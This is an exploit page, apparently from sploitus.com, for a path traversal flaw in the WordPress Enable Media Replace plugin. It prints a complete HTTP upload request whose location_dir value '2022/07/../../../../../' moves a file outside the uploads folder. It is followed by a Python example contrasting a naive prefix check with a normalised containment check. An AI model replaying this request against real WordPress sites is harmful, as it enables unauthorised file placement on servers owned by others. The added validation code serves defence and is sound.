## https://sploitus.com/exploit?id=WPEX-ID:5872F4BF-F423-4ACE-B8B6-D4CC4F6CA8D9
When replacing the file, select "Replace the file, use new file name and update all links" and tick "Put new Upload in Updated Folder:", then put the payload in this setting: `2022/07/../../../../../`

```http
POST /wp-admin/upload.php?page=enable-media-replace%2Fenable-media-replace.php&action=media_replace_upload&attachment_id=5882&_wpnonce=7a3549cbce&noheader=1 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------160389504219271480051605192775
Content-Length: 1370
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="ID"

5882
-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="userfile"; filename="a.txt"
Content-Type: text/plain

Test file
-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="replace_type"

replace_and_search
-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="timestamp_replace"

2
-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="custom_date"

July 27, 2022
-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="custom_hour"

13
-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="custom_minute"

43
-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="custom_date_formatted"

2022-07-27
-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="new_location"

1
-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="location_dir"

2022/07/../../../../../
-----------------------------160389504219271480051605192775--
```

The file will be moved to the parent folder of the blog.
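
The containment check that a `location_dir` value like the one above has to pass before a file is moved, shown next to a weak prefix check that it defeats. This is an added example, not the plugin's code or its fix; `UPLOADS_BASE`, the function names and the sample values are assumptions made for illustration.

```python
import posixpath

# Assumed uploads root for illustration; on WordPress this comes from wp_upload_dir().
UPLOADS_BASE = "/var/www/html/wp-content/uploads"

def naive_is_inside(location_dir, base=UPLOADS_BASE):
    """Weak check: string prefix on the un-normalized path."""
    return posixpath.join(base, location_dir).startswith(base)

def resolve_location_dir(location_dir, base=UPLOADS_BASE):
    """Return the normalized target directory, or None if it leaves `base`."""
    if "\x00" in location_dir or "\\" in location_dir:
        return None  # reject NUL bytes and Windows-style separators outright
    base = posixpath.normpath(base)
    # Treat the value as relative to the uploads root, then collapse "." / "..".
    target = posixpath.normpath(posixpath.join(base, location_dir.lstrip("/")))
    # Component-wise comparison, so ".../uploads-old" is not mistaken for ".../uploads".
    if posixpath.commonpath([base, target]) != base:
        return None
    return target

# Constructed sample values; the second is the location_dir from the request above.
SAMPLES = ["2022/07/", "2022/07/../../../../../", "2022/07/../08", "../uploads-old/x"]

def audit(samples=SAMPLES):
    """Map each sample to (naive verdict, hardened result)."""
    return {s: (naive_is_inside(s), resolve_location_dir(s)) for s in samples}

if __name__ == "__main__":
    for value, (naive_ok, resolved) in audit().items():
        print(f"{value!r:32} naive={naive_ok!s:5} hardened={resolved}")
```

The check is purely lexical so it runs without a filesystem; on a live server, also resolve symlinks (for example with `os.path.realpath`) before comparing against the uploads root.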